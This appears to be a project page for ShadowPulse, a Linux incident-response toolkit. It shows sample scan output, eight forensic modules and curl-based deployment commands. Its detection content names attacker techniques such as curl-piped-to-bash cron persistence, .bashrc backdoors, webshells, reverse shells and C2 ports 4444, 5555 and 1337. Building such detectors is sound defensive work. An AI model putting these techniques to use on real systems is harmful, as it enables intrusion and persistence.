ShadowPulse

Linux Threat Hunting and Incident Response Toolkit. Automated evidence collection, malware detection, persistence hunting, IOC extraction, and forensic reporting.

When a breach happens, the first 30 minutes determine everything. ShadowPulse gives incident responders a production-ready toolkit that deploys in seconds and covers the entire forensic lifecycle — from volatile data capture to chain-of-custody reporting.

Evidence CollectionMalware DetectionPersistence Hunting IOC ExtractionWebshell ScannerRootkit Checks Timeline ReconstructionChain of CustodyHTML Reports

View Repository Download Script

root@incident:~#

$ sudo ./shadowpulse.sh _____ __ __ ____ __ / ___// /_ ____ _____/ /___ _ __ / __ \__ __/ /_____ ___ \__ \/ __ \/ __ / __ / __ \ | /| / / / /_/ / / / / / ___/ _ \ ___/ / / / / /_/ / /_/ / /_/ / |/ |/ / / ____/ /_/ / (__ ) __/ /____/_/ /_/\__,_/\__,_/\____/|__/|__/ /_/ \__,_/_/____/\___/ [INFO] Case directory: /var/shadowpulse/case-20260309-143022 [PASS] System: web-prod-01 (5.15.0-92-generic) ═══ MODULE 1: VOLATILE DATA COLLECTION ═══ [DATA] Process tree captured (247 processes) [ALERT] [HIGH] Deleted files still open — 3 deleted files held open [PASS] Volatile data collection complete ═══ MODULE 2: PERSISTENCE MECHANISM HUNTING ═══ [ALERT] [CRITICAL] Suspicious cron job — contains curl|bash indicators [ALERT] [CRITICAL] Backdoor in shell profile — .bashrc injection [DATA] SSH authorized_keys: 4 keys found ═══ MODULE 3: MALWARE & WEBSHELL DETECTION ═══ [ALERT] [CRITICAL] Potential webshells detected — 2 files match signatures [ALERT] [HIGH] Recently modified system binaries — 3 binaries changed [PASS] No crypto miners detected ═══ MODULE 7: IOC EXTRACTION ═══ [DATA] External IPs (active connections): 12 [ALERT] [HIGH] Suspicious commands in shell history — 7 patterns found ════════════════════════════════════════════════════════════ ShadowPulse Investigation Complete Hostname: web-prod-01 Modules: 8 Findings: 14 Critical: 3 High: 5 Medium: 4 Low: 2 Evidence: /var/shadowpulse/case-20260309-143022/evidence/ Report: /var/shadowpulse/case-20260309-143022/report.html ════════════════════════════════════════════════════════════

Forensic Modules

50+

Evidence Artifacts

30+

Detection Signatures

Dependencies

Forensic Modules

8 modules covering the entire incident response lifecycle

Each module collects evidence, detects anomalies, and generates findings with severity classification and remediation guidance. All evidence is SHA-256 hashed for chain-of-custody preservation.

Volatile Data Collection

Process trees, open file descriptors, deleted-but-open files, kernel modules, memory maps, mount points, environment variables with secret detection.

ps auxwwf | lsof | /proc/maps | lsmod | mount

Persistence Hunting

Cron jobs (system + user), systemd services and timers, init scripts, rc.local, shell profiles (.bashrc, .profile), SSH authorized_keys, LD_PRELOAD, at jobs.

crontab | systemctl | /etc/init.d | .bashrc | authorized_keys

Malware and Webshell Detection

Hidden files in /tmp and /dev/shm, SUID binary audit, webshell signature scanning (14 patterns), crypto miner detection, reverse shell detection, rootkit checks, package integrity verification.

find | grep signatures | rpm -Va | dpkg --verify

User and Authentication Analysis

UID 0 account audit, passwordless accounts, sudoers NOPASSWD review, login history (success + failed), SSH activity analysis, recently created users.

/etc/passwd | /etc/shadow | sudoers | last | lastb

Network Forensics

Active connections with process mapping, suspicious C2 port detection (4444, 5555, 1337), DNS configuration audit, ARP table, routing, firewall rules, promiscuous mode detection.

ss -tulnap | ip neigh | iptables | nftables | ip link

Log Analysis

Collection of auth, syslog, kernel, web server logs. Log tampering detection (empty/truncated files). Brute force indicators, privilege escalation attempts, audit log analysis.

/var/log/* | ausearch | grep patterns

IOC Extraction

External IP addresses (connections + logs), domain extraction, URL harvesting, file hashes (SHA-256) of suspicious binaries, shell history analysis for attack commands.

ss | grep -oE | sha256sum | history analysis

Timeline Reconstruction

File modification timeline (72 hours), authentication event timeline, package installation history, login session timeline. Sorted chronologically for investigation.

find -printf '%T+' | last | dpkg.log | rpm --last

Deployment

Deploys in seconds. No dependencies. No installation.

# Deploy to a compromised system curl -sO https://raw.githubusercontent.com/SiteQ8/ShadowPulse/main/shadowpulse.sh chmod +x shadowpulse.sh sudo ./shadowpulse.sh # Run specific modules only sudo ./shadowpulse.sh --volatile --malware --network # Hunt for persistence and lateral movement sudo ./shadowpulse.sh --persistence --users --logs # Extract IOCs for threat intel sharing sudo ./shadowpulse.sh --ioc --timeline # Custom output directory for case management sudo ./shadowpulse.sh --output /cases/INC-2026-042

Output

Forensic evidence package with chain of custody

/var/shadowpulse/case-20260309-143022/ ├── evidence/ Raw collected artifacts │ ├── processes-tree.txt Process hierarchy snapshot │ ├── open-files.txt File descriptor listing │ ├── deleted-files-open.txt Deleted but open files │ ├── kernel-modules.txt Loaded kernel modules │ ├── cron-system.txt System cron jobs │ ├── cron-users.txt Per-user cron jobs │ ├── systemd-services.txt All systemd units │ ├── ssh-authorized-keys.txt SSH public keys │ ├── webshells-*.txt Detected webshell files │ ├── suid-binaries.txt SUID/SGID audit │ ├── netstat-established.txt Active connections │ ├── ioc-ips.txt External IP addresses │ ├── ioc-hashes.txt SHA-256 file hashes │ ├── ioc-history.txt Suspicious commands │ ├── timeline-files.txt File modification timeline │ └── ... (50+ evidence files) ├── chain-of-custody.sha256 SHA-256 hashes of ALL evidence └── report.html Visual forensic report